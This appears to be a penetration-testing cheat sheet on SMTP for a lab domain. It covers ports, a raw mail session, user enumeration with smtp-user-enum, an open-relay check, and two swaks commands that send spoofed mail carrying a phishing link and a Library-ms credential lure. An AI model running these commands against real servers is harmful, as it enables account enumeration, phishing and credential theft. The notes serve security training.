SMTP (25-465-587)

Simple Mail Transfer Protocol.

Protocol Information

SMTP is a communication protocol used for the transmission of electronic mail. SMTP is often combined with IMAP or POP3 protocols, for email management.

Client (MUA) ➞ Submission Agent (MSA) ➞ Open Relay (MTA) ➞ Mail Delivery Agent (MDA) ➞ Mailbox (POP3/IMAP)

Port

25 TCP

SMTP (unencrypted)

465 TCP

SMTP (encrypted)

587 TCP

SMTP (encrypted)

Config File

/etc/postfix/main.cf

Interact

telnet <IP> <PORT>

nc <IP> <PORT>

Commands and Response.

Example

telnet <IP> <PORT>
> HELO mail1.inlanefreight.htb   # or EHLO inlanefreight.htb
> AUTH PLAIN 
> <OUTPUT>  # echo -ne '\0mail1.inlanefreight.htb\0<PASSWORD>' | base64
> MAIL FROM: <cry0l1t3@inlanefreight.htb>
> RCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure
> DATA
> SUBJECT: Test message
> <MESSAGE>
> .
> QUIT

Attacks

User Discovery

The VRFY command causes the server to check whether or not a particular user exists and get the answer. The EXPN command is used with a mailing list and will list all users on that list. The RCPT TO command identifies the recipient of the e-mail message and can be repeated several times to list valid users.

Tools

Details

smtp-user-enum

smtp-user-enum -M [VRFY,EXPN,RCPT] -U <WORDLIST> -t <IP> -w 60 [-D <DOMAIN> for RCPT]

Open Relay

An open relay is a mail server that is configured in such a way that it allows email to be sent to anyone, even unauthorized users, without any authentication control or limitation on access. In other words, it is an “open” mail server that accepts to forward email from external sources to recipients outside its domain. This configuration can be very problematic because it makes the server vulnerable to improper use, particularly by spammers and malicious attackers (phishing). These can exploit open relay to send huge amounts of unwanted email, hiding their identities and making it appear that the mail traffic is coming from the exploited server.

Check if it is an Open Relay

NMAP NSE: smtp-open-relay

Sending emails without authentication

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server <IP>

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com -ap --attach @config.Library-ms --body @body.txt --header 'Subject: Error' --suppress-data --server <IP>

Last updated 19 days ago

hashtagPort

hashtagConfig File

hashtagInteract

hashtagAttacks

hashtagUser Discovery

hashtagOpen Relay